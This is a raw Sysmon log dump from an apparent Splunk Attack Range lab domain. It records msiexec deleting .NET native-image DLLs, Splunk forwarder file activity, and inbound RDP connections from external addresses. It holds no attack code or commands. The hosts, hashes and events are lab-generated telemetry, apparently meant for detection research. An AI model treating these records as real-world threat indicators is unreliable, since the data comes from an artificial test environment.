Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94E62E6341C52E0B54B36A5CB3F76E91,SHA256=8282BA7C10F25FE91FBEB200C8714A9DF01B5FDBE0C27066EDC49F915DD1FC03,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049980Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:11.702{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52508-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000072758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9CX24I1PAE\System.ni.dll.auxMD5=5EDEB7CB71D6AFF9F7615368262F0EDB,SHA256=A2F1D764B84B3222C7E77D8A9BB17EB369BEBA8DC915B549647C7D1331644E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.875{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9CX24I1PAE\System.ni.dllMD5=CE8C60E7028F27055C4A6C327FA97113,SHA256=4A235FCBCAC5F3713DF6A2BC0636A0FE5F12CA49B3CA2DD18034902FD4C129C0,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:14.189{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com52760-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\96CHNE9KEV\System.Xml.ni.dll.auxMD5=3A2FF34743BE9234A2C896E3C7A8EA0E,SHA256=1F1647BAB2A25AF7215FCDC9C03F88D0A2CB1EAA1E61CEB6288D28B69E59D546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.610{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\96CHNE9KEV\System.Xml.ni.dllMD5=4BEBFFC9DAFC484D7BDA244385B9518C,SHA256=0B08FD59C9CF52A30AE65B34CD40378B906A1169456709207CA365A5783DBCD7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8YSMTK89XY\System.Transactions.ni.dll.auxMD5=799D1D6903AEF7B551CD4A4C6B265AA9,SHA256=EAE828D0DC70B8C0CADC0F2FB1EB4DAB7A5E36C371C4B8A27C807DE7C0974339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.438{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8YSMTK89XY\System.Transactions.ni.dllMD5=8D18FAAB7987602078CF848438C95F88,SHA256=AB760B68DE4E3D55C85FBC48423AC7C47C8A8C34FC3964E0473DA960D0BC3C5D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.375{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8WWG4NYYD0\System.Management.ni.dll.auxMD5=C01ECF7E635ACE095C407D20F703DED5,SHA256=8FAF355B875FE7A537D651283A77C77B5A95982427C0D520A99268846EFDFD84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.360{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8WWG4NYYD0\System.Management.ni.dllMD5=F1A2535A0424F3F86C727E007F7A6F03,SHA256=8429E3661DD8E26425E938C735597BB4545AAE73AC1EA8A6490140A4D9CB6AFA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8U1UQETKXN\System.Numerics.ni.dll.auxMD5=B112B901DBE457D5C44431DEF8018CE7,SHA256=E8A9B868DAAA55B69C61BE12D2C8D3EA8BB1F99EB970230BB6A867B65586B41D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8U1UQETKXN\System.Numerics.ni.dllMD5=3C15EEC6D52A4674FE204A7E3610D46E,SHA256=95EBC4E4BF44CE09D29EC4505D7B8548DA661278D4DF53F887CC357557F45A80,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8JIPYYTGS7\PresentationFramework.ni.dll.auxMD5=5AC47BDFF85309943EFE3B48015AE6CC,SHA256=B954B0424A3B86859EDEB4E1844EAA13FED43EDC3E64022F93D28850E174AF61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.313{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\8JIPYYTGS7\PresentationFramework.ni.dllMD5=8C13DC1C231C74434BE8B18DD5D86480,SHA256=1E1471068E3390B52D4DEA0BBF6532C3CD4FF8B396835933FBEDC7B9ADBE11B4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049986Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:15.923{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=295A229BB194A8E3B2EB1A679908E1EE,SHA256=65013D6477748B59BFAB953E6AC7A48C3CE821C451A3B42585E563C1266145F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049985Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:15.845{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A49C22B59FAF1D1D28ADB58DE3388B2,SHA256=8666E5CE0A51CAA8DECF0F958257492C05FD029E0351AD3B48E376279D6C746D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049984Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:13.236{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56982-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049983Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:13.063{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54033-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000072784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:15.193{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-21946-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000072783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\AJR4CNNP1H\System.Drawing.ni.dll.auxMD5=69DDCED53EB62AD5F23BABFB8BA6D163,SHA256=C5164F9DAFB6224D0280E449DA8D85EE507145BA79652D1C0E5994B86E4903F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.766{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\AJR4CNNP1H\System.Drawing.ni.dllMD5=2C489C8D4AF62D27FD4C18640F69CF5A,SHA256=09FDE2E93271A1BAD108E78FF0AD6662086D86D4095ED412E7064C9C50EC0117,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.735{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\AARSWFE6RE\System.Xml.ni.dll.auxMD5=C6B8D9FAFDC12F9D667B132D1BD24D04,SHA256=C2FC89CA115F96A788E5EA364A753E2D685A65BFEFE13145B138AE0309D2A99C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.735{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\AARSWFE6RE\System.Xml.ni.dllMD5=71BC2F8235C4E463DE58A0B06A7CC6E9,SHA256=D311CB68072B7387AF7CBF476708618CFD88A950AA11C17C74D0281AE97DB612,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.531{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\AAJJT00YQC\System.DirectoryServices.ni.dll.auxMD5=C868E3CE49BA0E024BA044791DD8B901,SHA256=019CED5A20050041A0B1C6A7259A71BC867DF0A952D36A451E86472359A39D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.531{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\AAJJT00YQC\System.DirectoryServices.ni.dllMD5=950230DF069FC31756D6F15EE8C95D84,SHA256=951D336C2A06FAE7FF8B42CE8F293B2A226DD338A2C36A233CFDD55C05FDA763,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.516{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\A7YUES1U1S\System.Configuration.ni.dll.auxMD5=0056AAE6263694AECA005FB9F4CFB72D,SHA256=12D06CC2F2616FC7265D9C9E30DCA481DC24D79EA4442FFA9B0DF6BD5BD0086C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.516{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\A7YUES1U1S\System.Configuration.ni.dllMD5=25EBFB35A3C0117023CBE947C69E27B5,SHA256=D9139DCB06B272BD35568F6C1496B1323311CF71BED1E7979CEC3D6B63287C73,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.469{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\A1LJGPPVH3\System.Numerics.ni.dll.auxMD5=5CC4A69861ADC3DC96AB2ACD2D9149CA,SHA256=8841D1CD4ABC260B2B0EE69E209E0F06023FE3C6D9D50A65510BDD29676904F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.469{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\A1LJGPPVH3\System.Numerics.ni.dllMD5=47D30AB50B1102E8FFEE9922F95C588B,SHA256=1FE316D9EADB703A05165965739493B8826C19A7C084EC53B50502A3231970F1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\A1150KSMAP\System.DirectoryServices.ni.dll.auxMD5=91B2F2790B225E9B80B1642A87D19DA5,SHA256=F23B64863222A016CF4439EEDC90057CFEC21BC75A0D7D8118CE8996F42E8B98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.453{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\A1150KSMAP\System.DirectoryServices.ni.dllMD5=EB699F153BF3322C608FA8EC593641AC,SHA256=C88E1D58C19711E2951ACAD7EFB6D6F420D52D13C93B77B4E80B36396EB5AF10,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9ZPZ8SRZBF\System.Numerics.ni.dll.auxMD5=4554DB58691601FBD376774956021AD0,SHA256=C97E662629BE150ADEDC669040A735BF6BE5C8F4DC6B1007F4F041A1E4CC2969,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.407{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9ZPZ8SRZBF\System.Numerics.ni.dllMD5=277A874D3C7FAF514D476913C562779E,SHA256=B0EBBA50E089358BBE363BB14DE6D80AB1F92F52C30C8FE13BC4358C8BB252B1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.407{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D59E5D7191957D1D78E12F3C043AF513,SHA256=C6E72524804739F2CF349E17455E275B026C6BAA2A0C2B6118CCDA5D1F57AC70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9YME0DIJZO\System.ni.dll.auxMD5=9651A4D69D091A91F7509B493895084C,SHA256=7F97FFC6DBCF14DEF386747D99B2204F6C0BE9C123F585888BF0BC23B424155B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.391{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9YME0DIJZO\System.ni.dllMD5=0D511A145E1BEFBF8048E4958B18EF8C,SHA256=5B4E622B50F3659A09BC10F7047FB5AECD568565E358232DBD8B85B615F42FB0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9Y9I29WN2V\System.DirectoryServices.ni.dll.auxMD5=8451615FB68C5792747E6B9F17CA39FB,SHA256=F36CB4DA58C61B9521D0B82E1AF455BC583B717FA5D13195E5D3E465B4745764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9Y9I29WN2V\System.DirectoryServices.ni.dllMD5=C2B7030570684F5C7BAF333C9C6DB4B5,SHA256=1C938CA0C98F20F6200B9EEBD2895CE9CA98DD6500A25B734C0D5D7442CDC641,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9IY6J183BS\System.Numerics.ni.dll.auxMD5=EB049ABA5517841C734115079F8BD603,SHA256=2877312EFE8951A61700B5A8981F42E506060308E5D402F8E5FC7F879EDAC5FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9IY6J183BS\System.Numerics.ni.dllMD5=D282D2158C31BBF5B31EE855F7B15EC7,SHA256=72E1074D33DC23AB1D680257B353F3C2210E1C9095D3284570DC678FA3E93907,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9ILKVTSEI7\System.Security.ni.dll.auxMD5=BC3DDDB5F07C162D92B2037E6880680C,SHA256=4B74A1D3FF9277CA53DCF8D3541DADA05ED4A1B570F67D2B7C45957DF366448F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9ILKVTSEI7\System.Security.ni.dllMD5=87E23D848DCDA15E4AB088D7471A99D2,SHA256=55FE1EAC63C9A18285EB2C4CF0CCF1FC54C4DDBE4AC3A5E661889E7C22AEF598,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9E7FE8BE9W\System.ni.dll.auxMD5=97D37AFB390992CE3C6F1D4E1112CAA5,SHA256=E9BE5584192A17CDF882242AB2C104E2A185B276E589F81AEC50663E4BA6F881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\9E7FE8BE9W\System.ni.dllMD5=709A692740777021A1BC08A50B61C807,SHA256=AD85D06B3912A64986318D87202BDCAD748D6E68E3B693D37459EF9874889CCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049987Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:16.892{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3992FBD009BA3E7CD0E35D70300E4EA5,SHA256=3B83CE91B71949A29F52DBAF7430CD87B80C8366CBA2C0BC5BB7B752DEFD6E07,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000072796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.778{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-20581-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.573{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-23311-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:16.257{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57518-false10.0.1.12-8000- 23542300x800000000000000072793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BG859LY4JA\System.ni.dll.auxMD5=C4730B6A55D190A4DBF04E66F071626C,SHA256=6CC8AF52FD8F807A5DB3DEA7FE2FDE042772BB6BF401E70438FDC785170742FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.797{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BG859LY4JA\System.ni.dllMD5=00248C9DAA0CD4F85D375CDF673D8581,SHA256=67D7D7935E525B620FB235CAB6565AC7A0C42D0013C03BAE6FB7301B7B5DE71C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BE7ZHF1NHM\System.ServiceModel.ni.dll.auxMD5=E3B93DB9969E47579EF3CD308AD6F525,SHA256=57D5CB25CAA75CD1DE2F24CF07C558C8EAC60FBA70B71B5ADDA6CF3EBFF051F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.578{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\BE7ZHF1NHM\System.ServiceModel.ni.dllMD5=FE7C04F63CBEA73272C0FF5DE1E67B31,SHA256=16280704304C7361CCDB7C088C00D94F72CF2B83E18186D96029EF12C8CBE1A1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.422{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE1BB2B65B298BBB9C6AFE80023427E5,SHA256=4DE278F974F55A5BC7101D30F14D79C0C29D3B0728AAB79018AD7EB9FDEB5C31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\B5ZN0CRY12\System.Xml.ni.dll.auxMD5=3EC54DEE44368C49379AC078874C7D69,SHA256=57BB02ECC01EC1AA52BCC116D735901E137A77E9943552D01B2E6493AF320307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\B5ZN0CRY12\System.Xml.ni.dllMD5=D0E98E24CEAD9C2E25CFA692EC9250E5,SHA256=8A4926A4947088F44C02986196531D0D409F46A3D45974B17CA0A33EB0857457,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\B3Q0WSI9WO\System.Windows.Forms.ni.dll.auxMD5=D446BDCD7E3BFA151BD38417CA52BBB4,SHA256=DC1794960B5836EC691C2DC58B068E76C8FE07B8A1293373ED30ED08A02887B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:17.031{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\B3Q0WSI9WO\System.Windows.Forms.ni.dllMD5=EBA141EB6870A5CE8F381C7423130E8C,SHA256=60BF35B16E89046C8D5D49C3FE8D73AF63226FA1A4C865B96EE067035A3C21A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049991Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:17.907{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCBCBC64132AD10D8A5B6AE67FD0C4C5,SHA256=BAD23765D2855E9344DF1375D4E7CEA29B03D280703D3D1D3917FE8CD7BE07DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049990Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 